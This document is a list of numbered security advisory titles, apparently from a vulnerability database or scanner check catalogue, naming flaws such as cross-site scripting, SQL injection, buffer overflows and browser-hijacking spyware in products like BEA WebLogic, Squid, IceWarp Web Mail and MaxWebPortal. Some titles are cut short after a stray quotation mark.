[20995] SUN Java Web Start untrusted application allows attacker elevated privileges
[20987] WebHints hints.pl command execution
[20967] Microsoft Exchange Outlook Web Access cross-site scripting
[20946] Novell NetMail Modweb agent denial of service
[20945] Novell NetMail Modweb agent cross-site scripting
[20933] IBM AIX diagTasksWebSM command buffer overflow
[20897] SurfControl SuperScout Web Filter HTTP bypass filter
[20889] WWWeb Concepts Events System password SQL injection
[20872] LiteWeb URL bypass security
[20871] IBM WebSphere Application Server Administration Console buffer overflow
[20861] NEXTWEB (i)Site denial of service
[20858] NEXTWEB (i)Site databases/users.mdb file information disclosure
[20856] NEXTWEB (i)Site login.asp script SQL injection
[20818] Microsoft Windows WebClient Service buffer overflow
[20816] PicoWebServer URL buffer overflow
[20811] NikoSoft WebMail cross-site scripting
[20802] BEA WebLogic Server and Express login page cross-site scripting
[20793] BEA WebLogic Server and Express Web application allows unauthorized access
[20783] Multiple vendor Web browser JavaScript window object code execution
[20772] MaxWebPortal password.asp SQL injection
[20769] BEA WebLogic Server and Express loop denial of service
[20768] BEA WebLogic Portal password information disclosure
[20719] Ipswitch IMail Server Web Calendaring information disclosure
[20708] BEA WebLogic Server and Express error page cross-site scripting
[20706] BEA WebLogic Server and Express incorrect cookie parsing
[20704] BEA WebLogic Server and Express identity thread manipulation
[20703] BEA WebLogic Server and Express JDBC pool modification
[20671] Gentoo webapp-config fn_show_postinst temp file
[20651] WillingWebCam ww.exe obtain information
[20631] Sigma ISP Manager sigmeweb.dll SQL injection
[20615] WebcamXP chat name denial of service
[20607] Webmin configuration file permissions
[20579] KorWeblog lng parameter directory traversal
[20562] MaxWebPortal post.asp SQL injection
[20561] MaxWebPortal post.asp script injection
[20560] MaxWebPortal post.asp cross-site scripting
[20557] Neteyes NexusWay Web module command execution
[20544] Guestbook PRO module for WebAPP cross-site scripting
[20478] 4D WebSTAR V Tomcat plug-in buffer overflow
[20472] Merak Mail Server and IceWarp Web Mail arbitrary file existence
[20471] Merak Mail Server and IceWarp Web Mail viewaction.html and importaction.html file and directory manipulation
[20469] Merak Mail Server and IceWarp Web Mail multiple scripts path disclosure
[20467] Merak Mail Server and IceWarp Web Mail multiple scripts cross-site scripting
[20444] RSA SecurID Web Agent buffer overflow
[20413] 04WebServer directory traversal
[20381] Web Crossing WebX webx cross-site scripting
[20380] Microsoft Windows Web View command execution
[20356] Open WebMail open function command execution
[20339] Squid Web Proxy Cache HTTP header cache poisoning
[20335] MaxWebPortal multiple scripts SQL injection
[20334] Squid Web Proxy Cache httpProcessReplyHeader security bypass
[20311] Oracle Application Server UseWebcacheIP mod_access bypass
[20310] Oracle9iAS Application Server and Web Cache file modification
[20309] Oracle9iAS Application Server and Web Cache cross-site scripting
[20292] MaxDB getIfHeader WebDAV function buffer overflow
[20276] BEA WebLogic Server JndiFramesetAction cross-site scripting
[20271] SqWebMail HTTP response splitting attack
[20270] MaxDB WebDAV getLockTokenHeader function buffer overflow
[20261] IBM WebSphere Application Server error page cross-site scripting
[20238] Novell Nsure Audit webadmin.exe denial of service
[20217] netMailshar Professional Webmail service directory traversal
[20195] Sun Java System Web Proxy Server buffer overflow
[20176] GeneWeb maintainer scripts insecure file permissions
[20168] WheresJames Webcam Publisher buffer overflow
[20166] WebcamXP chat name cross-site scripting
[20151] PMSoftware Simple Web Server buffer overflow
[20099] IBM WebSphere Application Server information disclosure
[20082] Sun Java System Web Server denial of service
[20075] WebCT message cross-site scripting
[20026] Microsoft Outlook and Outlook Web Access email client address spoofing
[20017] Webwasher CSM navTo2 parameter cross-site scripting
[19949] Turnkey Website Shopping Cart SearchResults.php script SQL injection
[19929] MaxWebPortal links_add_form.asp cross-site scripting
[19928] MaxWebPortal events_functions.asp SQL injection
[19888] web-app.org WebAPP unspecified information disclosure
[19813] SurgeMail webmail.exe cross-site scripting
[19804] SurgeMail Webmail "
[19779] betaparticle blog Web root information disclosure
[19756] Sun Java Web Start JNLP property tag privilege elevation
[19740] NotifyLink Enterprise Server interface plaintext password
[19700] IBM WebSphere Commerce information disclosure
[19657] Xerox MicroServer Web Server URL denial of service
[19654] Active WebCam file disclosure
[19653] Active WebCam memory exhaustion denial of service
[19652] Active WebCam path disclosure
[19651] WEBinsta Mailing Manager inc/initdb.php file include
[19650] Active WebCam filelist.html denial of service
[19647] Active WebCam floppy disk request denial of service
[19618] phpWebLog include/init.inc.php script PHP file include
[19602] Xerox MicroServer Web Server unauthenticated default account security bypass
[19584] IBM WebSphere allows connection without a password
[19539] BEA WebLogic Server and Express banner has been enabled
[19493] CIS WebServer dot dot directory traversal
[19487] WebMod server.cpp script heap based buffer overflow
[19482] phpWebSite Announce module allows code execution
[19480] phpWebSite index.php search module path disclosure
[19404] Xinkaa WEB Station directory traversal
[19394] WebConnect WCP_USER parameter directory traversal
[19393] WebConnect device name denial of service
[19369] WebCalendar webcalendar_session parameter SQL injection
[19346] PHP-Nuke Downloads and Web Links modules cross-site scripting
[19335] Open WebMail logindomain cross-site scripting
[19332] Squid Web Proxy Cache xstrndup function denial of service
[19321] BEA Web Logic Server and Express authentication disclosure
[19315] Webmin encrypted password
[19313] ELOG weblog buffer overflow
[19308] IBM WebSphere Application Server JSP information disclosure
[19258] 602LAN Suite webmail directory traversal
[19236] multiple Web browsers IDN URL spoofing
[19225] Microsoft Outlook Web Access owalogon.asp script URL redirect
[19179] Eternal Lines Web Server multiple connection denial of service
[19177] Savant Web Server buffer overflow
[19162] WebAdmin modalframe.wdm file HTML injection
[19161] Alt-N Technologies WebAdmin useredit_account.wdm cross-site scripting
[19158] Merak Mail Server with IceWarp Web Mail importaction.html allows files to be viewed
[19157] Merak Mail Server with IceWarp Web Mail accountsettings_add.html allows files to be created
[19153] Merak Mail Server with IceWarp Web Mail weak password encryption
[19152] Merak Mail Server with IceWarp Web Mail user path disclosure
[19147] Merak Mail Server with IceWarp Web Mail multiple cross-site scripting
[19144] WebWasher Classic connect gain access
[19142] Squid Web Proxy Cache recvfrom denial of service
[19060] Squid Web Proxy Cache HTTP header cache poisoning
[19049] BRIBBLE webadmin authentication bypass
[19036] SquirrelMail webmail.php cross-site scripting
[19007] Squid Web Proxy Cache NTLM type 3 message denial of service
[18983] Squid Web Proxy Cache LDAP ACL security bypass
[18955] Novell GroupWise WebAccess Userid HTML injection
[18954] Novell GroupWise WebAccess error bypass authentication
[18895] MaxDB websql buffer overflow
[18888] Squid Web Proxy Cache gopherToHTML buffer overflow
[18884] Squid Web Proxy Cache WCCP denial of service
[18864] Multiple vendor Web browser modal dialog spoofing
[18862] WebSeries report execution
[18860] WebSeries Payment Application password gain access
[18852] WebSeries Payment Application obtain information
[18850] WebSeries Payment Application password weak security
[18848] WebSeries Payment Application URL security bypass
[18838] WebSeries Payment Application path disclosure
[18818] Squid Web Proxy Cache NTLM fakeauth_auth helper denial of service
[18791] Jeuce Personal Web Server URL denial of service
[18787] Jeuce Personal Web Server dot dot directory traversal
[18759] The Web server is running PHP on the system
[18717] KorWeblog index.php PHP file include
[18648] SurgeMail unspecified Webmail vulnerability
[18554] pgn2web pgn2web.c buffer overflow
[18505] iWebNegar comments, index, and administrator SQL injection
[18490] Multiple Web browsers Content-Type spoofing
[18474] ASP Calendar allows access to administrative interface
[18468] Sun Java System Web and Application Server obtain information
[18406] Squid Web Proxy Cache hostname information disclosure
[18399] WebLibs weblibs.pl directory traversal
[18397] Multiple vendor Web browsers could spoof a pop-up window
[18386] MaxDB WebDav buffer overflow
[18384] Multiple Web browsers FTP command execution
[18361] IBM WebSphere update information disclosure
[18339] Microsoft Windows kernel LPC interface gain privileges
[18282] Multiple vendor Web browsers nested array denial of service
[18278] Hitachi Groupmax World Wide Web template names directory traversal
[18277] Hitachi Groupmax World Wide Web QUERY cross-site scripting
[18251] FunWebProducts bundler software program contains spyware
[18234] KorWeblog viewimg.php script directory traversal
[18187] WebGUI user profile
[18139] Claria.WebSecureAlert displays advertisements
[18090] Google Desktop view Web History archive
[18087] IceWarp Web Mail unspecified vulnerability
[18060] Webroot Spy Sweeper Enterprise administrative password in plain text
[18046] phpWebSite response splitting
[18041] Firewire/IEEE 1394 interface installed
[18036] 04WebServer DOS devices denial of service
[18034] 04WebServer Web log spoofing
[18033] 04WebServer error cross-site scripting
[18030] WebCalendar multiple .php scripts allows elevated access
[18029] WebCalendar validate.php encoded_login path disclosure
[18028] WebCalendar init.php file include
[18027] WebCalendar response splitting
[18026] WebCalendar IMG SRC cross-site scripting
[17976] Merak Mail Server IceWarp Web Mail deletes and moves files and directories
[17975] Merak Mail Server Icewarp Web Mail uses weak encryption
[17974] Merak Mail Server Icewarp Web Mail allows directory creation
[17973] Merak Mail Server Icewarp Web Mail cross-site scripting
[17961] Apache Web server ServerTokens has not been set
[17941] Sun Java System Web and Application Server denial of service
[17934] Cherokee Web Server format string
[17920] Sun Java System Web Proxy Server buffer overflow
[17919] Caudium Web Server denial of service
[17906] Microsoft ISA Server and Proxy Server allow Web site spoofing caused by cache reverse lookup results
[17905] Cyber Web Filter allows attacker to bypass IP address
[17795] Abyss Web Server device name denial of service
[17789] Multiple vendor Web browsers inactive tab information disclosure
[17788] Multiple vendor Web browsers inactive tab dialog spoofing
[17737] Express-Web cross-site scripting
[17690] IceWarp Web Mail view.html unspecified vulnerability
[17689] IceWarp Web Mail cross-site scripting
[17688] Squid Web Proxy Cache SNMP asn_parse_header denial of service
[17654] Microsoft Internet Explorer cache from SSL Web sites obtain information
[17652] Microsoft Internet Explorer Double Byte Character Set spoof Web site to obtain information
[17645] Microsoft Internet Information Server WebDAV multiple attributes per XML elements cause denial of service
[17599] NetworkActiv Web Server HTTP GET denial of service
[17565] aspWebCalendar account name information disclosure
[17520] MyWebServer allows administrative access
[17519] MyWebServer multiple connections denial of service
[17507] aspWebAlbum SQL injection
[17506] aspWebCalendar calendar.asp script SQL injection
[17422] WebIntelligence URL request allows file deletion
[17419] WebIntelligence input and document cross-site scripting
[17417] Multiple vendor Web browsers non-secure cookie hijack session
[17415] Multiple vendor Web browsers allows attacker to hijack a user's session
[17408] MyWaySpeedBar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software
[17407] DealHelper attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software
[17406] Praize Toolbar displays advertisements and resets the Web home page
[17397] IETray spyware hijacks Web page setting and redirects browsing sessions to obtain information
[17395] AdButler spyware attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software
[17360] BEA WebLogic Server and Express allow access to restricted URLs
[17359] BEA WebLogic Server and Express RMI admin command execute
[17358] BEA WebLogic Server and Express utilities and tasks plaintext password
[17357] BEA WebLogic Server and Express password disclosure
[17356] BEA WebLogic Server and Express HTTP version disclosure
[17354] BEA WebLogic Server and Express errors result in incomplete security
[17352] BEA WebLogic Server and Express Active Directory LDAP fails to remove admin privileges
[17350] BEA WebLogic Server and Express JNDI unbinding objects to obtain information
[17348] BEA WebLogic Server and Express administration port plaintext information
[17319] Merak Mail Server Icewarp Web Mail allows attacker to modify file
[17318] Merak Mail Server Icewarp Web Mail deletes and moves files and directories
[17317] Merak Mail Server Icewarp Web Mail creates file
[17316] Merak Mail Server Icewarp Web Mail view attachments
[17315] Merak Mail Server Icewarp Web Mail path disclosure
[17314] Merak Mail Server Icewarp Web Mail allows directory creation
[17313] Merak Mail Server Icewarp Web Mail cross-site scripting
[17299] Usermin installation of directory prior to installation of interface causes unspecified issue
[17293] Usermin Web mail function allows command execution
[17274] OpenCA Web front end allows cross-site scripting
[17222] Ipswitch IMail Web Messaging denial of service attack
[17220] Ipswitch Web Calendaring server denial of service
[17218] Squid Web Proxy Cache NTLMSSP packet denial of service
[17211] phpWebSite HTTP GET command execution
[17203] phpWebSite notes module script injection
[17202] phpWebSite comments module cross-site scripting
[17199] phpWebSite calendar module SQL injection
[17128] Webpac SQL injection
[17110] Easy File Sharing Web Server multiple HTTP requests denial of service
[17109] Easy File Sharing Web Server obtain information
[17100] web-app.org WebAPP index.php directory traversal
[17089] Multiple vendor Web browsers IFRAME denial of service
[17055] Nihuo Web Log Analyzer HTTP GET cross-site scripting
[17035] Web browser shell: and .exe have been detected
[17005] PHPMyWebHosting pmwh.php SQL injection
[16991] vRating admin directory allows access to administrative interface
[16960] MIMEsweeper for Web directory traversal
[16955] IceWarp Web Mail SQL injection
[16954] IceWarp Web Mail guest account path disclosure
[16952] IceWarp Web Mail calendar cross-site scripting
[16944] Apple Safari Web POST data information disclosure
[16934] IBM Tivoli Access Manager and WebSphere Application Server response splitting
[16901] Free Web Chat multiple connection denial of service
[16893] Free Web Chat usermanager.java denial of service
[16854] Webcam Watchdog sresult.exe cross-site scripting
[16852] Webbsyte Chat denial of service
[16837] Mozilla and Firefox user interface spoofing
[16835] lostBook Email and Website cross-site scripting
[16822] Hitachi Web Page Generator cross-site scripting
[16821] Hitachi Web Page Generator denial of service
[16806] EasyWeb FileManager pathext and view variable directory traversal
[16779] Web Helpdesk jobedit.asp SQL injection
[16775] Web+Center Cookie object SQL injection
[16766] Cisco ONS devices TL1 interface bypass authentication
[16749] AnomicHTTPProxy administration interface denial of service
[16710] eXtropia WebStore command execution
[16701] Gattaca Server web.tmpl cross-site scripting
[16689] 4D WebSTAR Server V symlink attack
[16688] 4D WebSTAR Server V allows attacker to view php.ini files
[16687] 4D WebSTAR Server V allows attacker to view directory listing
[16686] 4D WebSTAR Server V long FTP command buffer overflow
[16683] INweb Mail Server multiple connections denial of service
[16643] Mbedthis AppWeb VirtualHost bypass authorization
[16642] Mbedthis AppWeb improper HEAD and TRACE request handling
[16640] Mbedthis AppWeb message information disclosure
[16638] Mbedthis AppWeb URI allows access to restricted resources
[16636] Mbedthis AppWeb character information disclosure
[16603] Dr.Web scanMail buffer overflow
[16596] IBM Lotus Domino Web Access denial of service
[16588] Enceladus Server Suite Web service directory traversal
[16549] Open WebMail vacation.pl program execution
[16534] BEA WebLogic Server and Express bypass asterisk role
[16513] Infinity WEB login SQL injection
[16481] ArbitroWeb rawURL cross-site scripting
[16467] SqWebMail print_header-uc function cross-site scripting
[16448] Microsoft MN-500 Web administration denial of service
[16439] webAuction allows deletion of items
[16424] Web Wiz Forums registration_rules.asp cross-site scripting
[16421] BEA WebLogic Server and Express allows unexpected user identity
[16419] BEA WebLogic Server and Express SSL denial of service
[16415] Linksys Web Camera main.cgi cross-site scripting
[16384] Microsoft ISA Server Web Proxy redirect denial of service
[16380] Microsoft ISA Server Web Proxy SSL denial of service
[16360] Squid Web Proxy Cache NTLM buffer overflow
[16339] Linksys Web Camera file include
[16334] Webmin username or password denial of service
[16333] Webmin allows security restriction bypass
[16275] TinyWeb GET request allows attacker to download scripts
[16266] WildTangent WTHoster and WebDriver buffer overflow
[16170] Php-Nuke show weblink path disclosure
[16156] WebCT iframe, img, and object tags cross-site scripting
[16153] Squid Web Proxy Cache URL security bypass
[16123] BEA WebLogic Server and Express unauthorized access to Web applications
[16121] BEA WebLogic Server and Express bypass server policy
[16101] MyWeb long GET buffer overflow
[16076] SurgeLDAP bypass authentication allows access to administrative interface
[16048] AWeb "
[16047] Aldo's Web Server path disclosure
[16031] Web Wiz Forums unauthorized IP blocking
[16030] Web Wiz Forums pop_up_topic_admin.asp modify topic
[16029] Web Wiz Forums pop_up_ip_blocking.asp SQL injection
[15934] PostNuke Downloads, Web_Links, and openwindow.php cross-site scripting
[15928] BEA WebLogic Server and Express allows EJB object deletion
[15927] BEA WebLogic Server and Express URL pattern syntax information disclosure
[15926] BEA WebLogic stores administrative username and password in plain text
[15924] Cherokee Web Server print error function format string
[15890] X-Micro WLAN router default administrative interface login
[15865] BEA WebLogic Server and Express allows administrator or operator privileges
[15862] BEA WebLogic Server and Express custom trust manager certificate spoofing
[15861] BEA WebLogic Server and Express Authentication provider allows elevated privileges
[15860] BEA WebLogic Server and Express config.xml files stores usernames and passwords in plain text
[15829] X-Micro WLAN 11b Broadband Router default administrative interface account
[15826] BEA WebLogic connects multiple times allowing access to system
[15822] Open WebMail allows for unauthorized creation of directories
[15821] Kerio Personal Firewall Web filtering denial of service
[15743] MSWebDVD ActiveX Control long password buffer overflow
[15725] Encore Web Forum display.cgi command execution
[15676] Oracle Application Server Single Sign-On login Web page spoofing
[15652] WebCT Campus Edition @import cross-site scripting
[15567] xweb "
[15523] Twilight Utilities Web Server postfile.exe file creation
[15515] Twilight Utilities Web Server postfile.exe attfile parameter buffer overflow
[15506] Fizmez Web Server NULL error denial of service
[15504] IBM Lotus Domino webadmin.nsf file disclosure
[15502] IBM Lotus Domino webadmin.nsf cross-site scripting
[15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
[15466] HP Web-enabled Management Software HTTP Server unauthorized certificate upload
[15463] Oracle9i Application Server Web Cache HTTP Request Method buffer overflow
[15454] CFWebstore URL cross-site scripting
[15453] EMU Webmail init.emu path disclosure
[15452] EMU Webmail login cross-site scripting
[15451] EMU Webmail emumail.fcgi cross-site scripting
[15450] IBM WebSphere Application Server unknown issue
[15447] CFWebstore index.cfm SQL injection
[15444] Open WebMail userstat.pl allows execution of commands
[15436] Pegasi Web Server cross-site scripting
[15435] Pegasi Web Server "
[15424] Multiple vendor Web browsers bypass cookie path restriction
[15413] Apple Safari Web browser application large array denial of service
[15405] SURECOM Web configuration denial of service
[15404] PWebServer dot dot directory traversal
[15399] SLMail Pro SLWebmail buffer overflows
[15383] DAWKCo POP3 Server with WebMAIL extension session reactivation
[15381] GWeb HTTP Server directory traversal
[15360] IA WebMail Server email spoofing
[15359] IA WebMail Server view and edit_contact cross-site scripting
[15358] IA WebMail Server view and edit_contact denial of service
[15357] IA WebMail Server username buffer overflow
[15325] Dell OpenManage Web Server OCSGetOEMINIPathFile function buffer overflow
[15315] jgs Web server CGI cross-site scripting
[15289] WebzEdit done.jsp cross-site scripting
[15254] WebStores 2000 error.asp cross-site scripting
[15253] WebStores 2000 browse_items.asp SQL injection
[15239] Vizer Web Server long string denial of service
[15238] APC's Web/SNMP Management SmartSlot Card default password
[15219] phpWebSite announce and notes module SQL injection
[15122] MaxWebPortal register form cross-site scripting
[15121] MaxWebPortal Personal Messages SQL injection
[15120] MaxWebPortal dl_showall.asp, Personal Messages, and down.asp cross-site scripting
[15115] PHP-Nuke Search and Web_links modules SQL injection
[15112] Webservect backdoor
[15058] SqWebMail login error information disclosure
[15023] Zope ZSearch interface cross-site scripting
[15022] Web Crossing Content-Length header denial of service
[15019] Web Blog file parameter command execution
[15018] Forum Web Server post1.htm or postfile2.htm scripts cross-site scripting
[14993] Apple Mac OS X Safari Web browser undisclosed security issue
[14978] Web Blog "
[14977] BRS WebWeaver ISAPISkeleton.dll cross-site scripting
[14962] BEA WebLogic Server and Express users with Operator permissions information disclosure
[14961] BEA WebLogic Server and Express config.xml file stores password in plain text
[14959] BEA WebLogic Server and Express HTTP TRACE cross-site scripting
[14957] BEA WebLogic Server and Express managed server password disclosure
[14939] Gaim yahoo_web_pending cookie header buffer overflow
[14932] Reptile Web Server HTTP GET request denial of service
[14926] Mbedthis AppWeb OPTIONS or GET request denial of service
[14921] Novell NetWare Enterprise Web Server Perl information disclosure
[14919] Novell NetWare Enterprise Web Server CGI2PERL module cross-site scripting
[14915] NetBus Pro Web Server "
[14904] webcamXP cross-site scripting
[14893] WebTrends Reporting Center viewreport.pl path disclosure
[14892] 2Wire HomePortal Web form script allows cross-site scripting
[14891] NetCam Web Server running NetCam Viewer "
[14890] GoAhead WebServer content length parameter HTTP POST denial of service
[14889] GoAhead WebServer websUrlHandlerRequest function source code disclosure
[14879] GetWare WebCam Live HTTP request negative length denial of service
[14825] Symantec Web Security blocked site cross-site scripting
[14609] ZyncosMark attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software
[14605] ZeroPopup hijacks Web page setting and redirects browsing sessions to obtain information
[14601] WurldMedia attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software
[14599] World Wide WebMarketing may establish dial-up connections without a user's knowledge
[14598] WishBone Toolbar hijacks Web page setting and redirects browsing sessions to obtain information
[14595] WinlogonEXE hijacks Web page setting and redirects browsing sessions to obtain information
[14594] WinLocator BHO attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software
[14568] Whazit hijacks Web page setting and redirects browsing sessions to obtain information
[14567] webHancer obtain information
[14566] WebDialer may establish dial-up connections without a user's knowledge and allows execution of code
[14565] Web3000 opens advertisements and obtains information
[14560] VX2.BC777(SiteHlprBHO) attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software
[14556] Virusek Hijacker hijacks Web page setting
[14540] Transponder acts as part of the Web browser to bypass security software and allows execution of code
[14537] TopSearch attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software
[14529] Thesten attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software
[14524] SysWeb-Telecom Dialer may establish dial-up connections without a user's knowledge
[14504] ShopNav Hijacker attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software
[14503] ShopForGood hijacks Web page setting and redirects browsing sessions to obtain information
[14496] Secret-Crush hijacks Web page setting and obtains information
[14494] SearchWWW attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software
[14493] SearchV spyware hijacks Web page setting and redirects browsing sessions to obtain information
[14475] RightFinder hijacks Web page setting and redirects browsing sessions to obtain information
[14461] PSN - Private Search Network hijacks Web page setting and redirects browsing sessions to obtain information
[14459] ProDyne Webinstall obtain information
[14455] Possible Browser Hijack attempt hijacks Web page setting and redirects browsing sessions to obtain information
[14454] PKings-IEHelper obtains information and acts as part of the Web browser to bypass software
[14436] Netster Searchbar obtains information and acts as part of the Web browser to bypass software
[14435] NetSource hijacks Web page setting
[14429] NDG Systems hijacks Web page setting
[14426] NavExcel attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software
[14425] MyWebSearch Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software
[14424] MyFastAccess Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software
[14421] MSIEbho-Stub BHO attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software
[14418] MPGCom Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software
[14416] MetaDirect hijacks Web page setting and redirects browsing sessions to obtain information
[14413] MemoryMeter hijacks Web page setting and redirects browsing sessions to obtain information
[14406] MadFinder hijacks Web page setting and redirects browsing sessions to obtain information
[14402] Locators.com Toolbar obtains information and acts as part of the Web browser to bypass software
[14400] Kontiki attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software
[14396] JAJsoft.CSRS attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software
[14383] IETop100 attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software
[14382] IEmsg Hijacker hijacks Web page setting and redirects browsing sessions to obtain information
[14375] HungryHands BHO hijacks Web page setting and redirects browsing sessions to obtain information
[14369] HomepageWare hijacks Web page setting
[14361] Gratisware displays advertisements and acts as part of the Web browser to bypass software
[14357] GoHip hijacks Web page setting and redirects browsing sessions to obtain information and displays advertisements
[14351] GigexAgent SpeedDelivery hijacks Web page setting and redirects browsing sessions to obtain information
[14347] FreeScratchCards hijacks Web page setting and redirects browsing sessions to obtain information
[14343] FirstCash Websearch displays advertisements
[14339] FastWebFinder hijacks Web page setting and redirects browsing sessions to obtain information
[14291] CoolWebSearch.Svinit hijacks Web page setting and redirects browsing sessions to obtain information
[14290] CoolWebSearch redirects browsing sessions to obtain information and allows execution of code
[14258] BeWeb SRL may establish dial-up connections without a user's knowledge
[14237] Microsoft URLScan Web server information disclosure
[14211] BEA WebLogic Ant tasks could disclose administrator's password
[14210] BEA WebLogic JDK XML denial of service
[14201] DansGuardian Webmin Module edit.cgi view and modify files
[14196] Sun ONE Web Server buffer overflow
[14186] SAP Internet Transaction Server (ITS) and Web Application Server multiple buffer overflows
[14131] Webcam Watchdog HTTP GET buffer overflow
[14121] GNU Mailman administrative Web page cross-site scripting
[14087] Multiple Web browsers HTTP Referer header information disclosure
[14068] DCAM WebCam Server "
[14048] Active WebCam "
[14047] Active WebCam error page cross-site scripting
[14024] WebArtFactory CMS could allow unauthorized access to Web pages
[13971] Unicenter Remote Control (URC) help interface allows elevated privileges
[13968] Cyclonic WebMail spoof email messages
[13966] Cyclonic WebMail allows access to stored email file
[13964] Cyclonic WebMail sids subfolder session hijack
[13938] @Mail WebMail System atmail.pl, search.pl, and reademail.pl scripts SQL injection
[13936] @Mail WebMail System showmail.pl email access
[13934] BNCweb BNCquery.pl script information disclosure
[13923] WebEye Video Server information disclosure
[13917] Abyss Web Server directory password bypass
[13898] Websense Enterprise blocked sites cross-site scripting
[13891] Sun ONE Web Server denial of service attack
[13873] Adobe Macromedia JRun administrative interface cross-site scripting
[13781] SqWebMail session hijacking
[13775] phpWebFileManager index.php "
[13774] SAP DB Web Database Manager generates predictable session IDs
[13772] SAP DB web-tools installation has default services
[13771] SAP DB Web Agent Administration long HTTP request buffer overflow
[13770] SAP DB Web Agent Administration allows unauthorized access
[13769] SAP DB web-tools "
[13766] SAP DB niserver interface buffer overflow
[13759] Web Wiz Forums register.php cross-site scripting
[13756] WebWasher Classic proxy port cross-site scripting
[13755] Symantec pcAnywhere help interface allows attacker to gain SYSTEM privileges
[13752] BEA WebLogic MBeanHome allows attacker to obtain configuration information
[13751] Multiple vendor programs Netlink interface spoofed message denial of service
[13750] BEA WebLogic foreign Java Messaging Service provider password is stored in plain text
[13749] BEA WebLogic malicious data causes denial of service of Node Manager
[13747] BEA WebLogic Server and Express using the T3S protocol allows network monitoring to obtain information
[13745] BEA WebLogic proxy plug-in causes denial of service
[13742] Fortigate administrative interface cross-site scripting can disclose admin password
[13650] Bugzilla Web feature could allow an attacker to obtain information
[13643] SimpleWebServer "
[13616] MLdonkey administrative interface allows attacker to obtain information
[13581] Web Wiz Forums quote mode allows access to messages
[13580] IA WebMail Server HTTP GET request buffer overflow
[13572] Plug and Play Web Server GET request to port 8080 causes denial of service
[13571] BRS WebWeaver long string in User-Agent field buffer overflow
[13568] BEA WebLogic InteractiveQuery.jsp cross-site scripting
[13549] SimpleWebServer referer variable of HTTP header buffer overflow
[13533] WebTide file and directory disclosure
[13496] HP Web-enabled management agents could allow an attacker to gain privileges
[13486] Web Wiz Forums cross-site scripting in forum_members.asp, members.asp, and pm_buddy_list.asp scripts
[13402] TinyWeb HTTP GET request denial of service
[13379] File-Sharing for net and Forums Web Server Subject and Your Message fields cross-site scripting
[13363] PHP-Nuke WebMail could allow an attacker to include PHP files
[13362] Easy File Sharing Web Server HTTP request to log file or option.ini file information disclosure
[13361] Easy File Sharing Web Server Your Message field buffer overflow
[13360] Easy File Sharing Web Server Title field denial of service
[13333] MPWeb Pro "
[13309] webfs "
[13308] webfs long pathname buffer overflow
[13300] Microsoft Internet Explorer XML Web page containing Object Data tags could allow an attacker to execute code
[13294] Savant Web Server HTTP GET request denial of service
[13284] BRS WebWeaver fails to properly log IP addresses
[13273] Engarde Guardian Digital WebTool password disclosure
[13233] Plug and Play Web Server "
[13219] Plug and Play Web Server multiple commands cause denial of service
[13210] Yahoo! Webcam Viewer Wrapper ActiveX buffer overflow
[13208] Forum Web Server improper validation by login script allows administrative access
[13206] Forum Web Server "
[13200] Easy File Sharing Web Server cross-site scripting in forum
[13199] Easy File Sharing Web Server "
[13174] 4D WebSTAR password buffer overflow
[13161] Microsoft Internet Explorer allows an attacker to obtain cookies by opening Web site in _search window
[13144] WebX and WebX Lite "
[13127] EZ Web Site Builder "
[13120] ICQ Web Front message field cross-site scripting
[13115] FoxWeb PATH_INFO variable in foxweb.dll and foxweb.exe scripts buffer overflow
[13096] WebCalendar multiple scripts allow SQL injection
[13094] WebCalendar multiple scripts cross-site scripting
[13087] Web Wiz Internet could allow access to the search_engine.mdb database file
[13085] Web Wiz Journal could allow access to the journal.mdb database file
[13083] Web Wiz Mailing could allow access to the mailing_list.mdb database file
[13082] Web Wiz Guestbook could allow access to the WWGguestbook.mdb database file
[13081] Web Wiz Polls could allow access to weekly_poll.mdb database file
[13052] MPCSoftWeb Photo mpcsoftweb_photo.mdb containing usernames and passwords can be downloaded
[13051] MPCSoftWeb Forum mpcsoftweb_forum.mdb containing usernames and passwords can be downloaded
[13050] MPCSoftWeb Thread Tree mpcsoftweb_threadtree.mdb file containing usernames and passwords can be downloaded
[13049] MPCSoftWeb Chat Xtra mpcsoftweb_chat_xtra.mde file containing usernames and passwords can be downloaded
[12964] WebFtp accounts.dat plaintext password
[12950] DWebPro http.ini file plaintext password
[12948] oMail-webmail checklogin function code execution
[12926] Sun ONE Web Server denial of service
[12920] BEA WebLogic Server and Express, WebLogic Integration, and Liquid Data console application cross-site scripting
[12896] phpWebSite Calendar module buffer overflow
[12895] phpWebSite Calendar module path disclosure
[12894] phpWebSite Calendar, Fatcat or PageMaster modules cross-site scripting
[12891] phpWebSite Calendar module SQL injection
[12890] Webdeskpro could allow an attacker to modify roles
[12889] PostNuke Downloads.php and Web_links.php cross-site scripting
[12884] Webware for Python malicious cookie could allow an attacker to execute code
[12883] SkunkWeb Cache.py script directory traversal
[12881] SkunkWeb Handler.py script cross-site scripting
[12863] Web ChatServer cross-site scripting
[12850] IBM Lotus Instant Messaging and Web Conferencing information disclosure
[12843] D-Link DI-704P long HTTP request configuration Web page
[12831] Novell iChain could allow an attacker to redirect URLs to malicious Web site
[12820] Forum Web Server admin username default password
[12799] BEA WebLogic Server and Express could allow an attacker to gain elevated privileges
[12797] Novell NetWare with GroupWise WebAccess stores plaintext passwords in access_log file
[12761] KDE Konqueror plaintext username and password transmitted to third party Web site
[12747] Microsoft Windows RPC DCOM interface buffer overflow detected
